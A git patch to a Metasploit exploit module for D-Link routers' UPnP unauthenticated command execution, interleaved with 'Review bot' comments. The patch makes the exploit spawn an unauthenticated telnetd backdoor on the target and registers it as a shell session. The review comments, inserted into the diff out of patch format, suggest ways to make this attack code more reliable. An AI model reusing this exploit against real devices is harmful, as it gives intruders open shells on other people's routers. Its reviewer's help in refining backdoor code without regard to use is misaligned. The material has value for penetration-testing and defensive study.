From 47ca4fd48f480f8f825a5420e373bb07ef666ae2 Mon Sep 17 00:00:00 2001
From: m-1-k-3
Date: Sun, 14 Jul 2013 15:42:41 +0200
Subject: [PATCH] session now working

---
 .../linux/http/dlink_upnp_exec_noauth.rb | 51 ++++++++++++-------
 1 file changed, 33 insertions(+), 18 deletions(-)

diff --git a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb
index e6c762c378..a053d2c346 100644
--- a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb
@@ -58,13 +58,13 @@ class Metasploit3 < Msf::Exploit::Remote
             'Platform' => 'unix'
           }
         ],
-        [ 'Telnet', #all devices
+        [ 'Telnet', #all devices, use a netcat bind payload for getting a valid session
           {
             'Arch' => ARCH_CMD,
             'Platform' => 'unix'
           }
         ],
-        [ 'Linux mipsel Payload', #DIR-865, DIR-645
+        [ 'Linux mipsel Payload', #DIR-865, DIR-645, and some more
           {
             'Arch' => ARCH_MIPSLE,
             'Platform' => 'linux'
@@ -80,8 +80,8 @@ class Metasploit3 < Msf::Exploit::Remote
         OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),
         OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
         OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60]),
-        OptString.new('TELNETUSER', [false, 'User to start the telnet daemon (default: random)' ]),
-        OptString.new('TELNETPASS', [false, 'User to start the telnet daemon (default: random)' ])
+        #OptString.new('TELNETUSER', [false, 'User to start the telnet daemon (default: random)' ]),
+        #OptString.new('TELNETPASS', [false, 'User to start the telnet daemon (default: random)' ])
       ], self.class)
   end
@@ -144,6 +144,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
   def exploit
+    handler
     downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
     new_portmapping_description = rand_text_alpha(8)
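Review bot: The TELNETUSER and TELNETPASS options in the register_options hunk are commented out rather than removed, which leaves two lines of dead code in the options array; the same commented-out-code pattern recurs in the Telnet branch at @@ -170, the auth_info hash at @@ -199 and the merge_me hash at @@ -214. If starting telnetd without credentials is the intended design, delete those lines in all four places and record the decision once, e.g. `# TELNETUSER/TELNETPASS dropped: the Telnet target now starts telnetd without -l/-u (see exploit)`. Leaving the old option definitions in comments suggests to the next reader that they are merely temporarily disabled.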
@@ -170,15 +171,16 @@ class Metasploit3 < Msf::Exploit::Remote
     end
     if target.name =~ /Telnet/
-      passw = datastore['TELNETPASS'] || rand_text_alpha(8)
-      user = datastore['TELNETUSER'] || rand_text_alpha(4)
+      #passw = datastore['TELNETPASS'] || rand_text_alpha(8)
+      #user = datastore['TELNETUSER'] || rand_text_alpha(4)
       telnetport = rand(65535)
-      vprint_status("#{rhost}:#{rport} - User: #{user}")
-      vprint_status("#{rhost}:#{rport} - Password: #{passw}")
+      #vprint_status("#{rhost}:#{rport} - User: #{user}")
+      #vprint_status("#{rhost}:#{rport} - Password: #{passw}")
       vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
-      cmd = "telnetd -p #{telnetport} -l \"/usr/sbin/login\" -u #{user}:#{passw}"
+      #cmd = "telnetd -p #{telnetport} -l \"/usr/sbin/login\" -u #{user}:#{passw}"
+      cmd = "telnetd -p #{telnetport}" # -l \"/usr/sbin/login\" -u #{user}:#{passw}"
       type = "add"
       res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
       if (!res or res.code != 200)
@@ -199,13 +201,13 @@ class Metasploit3 < Msf::Exploit::Remote
         print_error("#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
       end
-      print_status "Attempting to start a Telnet session #{rhost}:#{telnetport} with #{user}:#{passw}"
+      print_status "Attempting to start a Telnet session #{rhost}:#{telnetport}" # with #{user}:#{passw}"
       auth_info = {
         :host => rhost,
         :port => telnetport,
         :sname => 'telnet',
-        :user => user,
-        :pass => passw,
+        #:user => user,
+        #:pass => passw,
         :source_type => "exploit",
         :active => true
       }
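Review bot: The new `cmd` line starts telnetd with no login program and no credentials, so the daemon left running on the device presumably accepts any connection for as long as it stays up, whereas the removed `-l "/usr/sbin/login" -u user:pass` form at least gated it; the module should state this residual exposure in its Description and, where the device allows it, stop the daemon once the session is established, and the commented-out tail on the `cmd` line should become that explanatory comment instead of a dead alternative. Separately, `telnetport = rand(65535)` can yield 0 or a privileged port that the device rejects or already has bound, in which case the request returns 200 but no listener appears; `telnetport = 1024 + rand(64511)` keeps the value in the unprivileged range. The `exploit` method starts before and continues after this hunk.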
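Review bot: `auth_info` is still assembled after its `:user` and `:pass` entries were commented out, so if it is still handed to report_auth_info further down (not visible in this hunk) the database gets a telnet credential record with no credential in it. Either drop the hash entirely or record the listener as a service, `report_service(:host => rhost, :port => telnetport, :name => 'telnet')`, which is what the remaining keys describe. The `print_status` line also carries a commented-out string tail, `# with #{user}:#{passw}"`, that should simply be removed.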
@@ -214,13 +216,26 @@ class Metasploit3 < Msf::Exploit::Remote
         'USERPASS_FILE' => nil,
         'USER_FILE' => nil,
         'PASS_FILE' => nil,
-        'USERNAME' => user,
-        'PASSWORD' => passw
+        #'USERNAME' => user,
+        #'PASSWORD' => passw
       }
-      # NOT WORKING
-      conn = Net::SSH::CommandStream.new(sock, '/bin/sh', true)
-      #puts conn.methods.to_s
-      start_session(self, "TELNET #{user}:#{passw} (#{rhost}:#{telnetport})", merge_me, false, conn.lsock)
+      #taken from ./lib/msf/core/auxiliary/commandshell.rb
+      info = "TELNET (#{rhost}:#{telnetport})"
+      sess = Msf::Sessions::CommandShell.new(sock)
+      sess.set_from_exploit(self)
+      sess.info = info
+
+      # Clean up the stored data
+      sess.exploit_datastore.merge!(merge_me)
+
+      # Prevent the socket from being closed
+      self.sockets.delete(sock)
+      self.sock = nil if self.respond_to? :sock
+
+      framework.sessions.register(sess)
+      sess.process_autoruns(datastore)
+
+      sess
   rescue
     print_error("#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
   end
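Review bot: The bare `rescue` at the end of the hunk now also covers the session construction, so any exception from `Msf::Sessions::CommandShell.new`, `framework.sessions.register` or `process_autoruns` is reported with the same "Backdoor service has not been spawned!!!" text as the spawn check at @@ -199, even though by this point the daemon was already accepted, and the real error is discarded. Capture and print it so failures here can be diagnosed, `rescue => e` followed by `print_error("#{rhost}:#{rport} - Failed to set up the telnet session: #{e.class}: #{e.message}")`, and consider narrowing the rescue to the connection step only. The comment says the block is copied from the auxiliary command-shell helper; whether an exploit module actually exposes a `sock` accessor to clear is not visible here, so either keep the `respond_to?` guard or drop that line once checked. The enclosing `exploit` method begins outside this hunk.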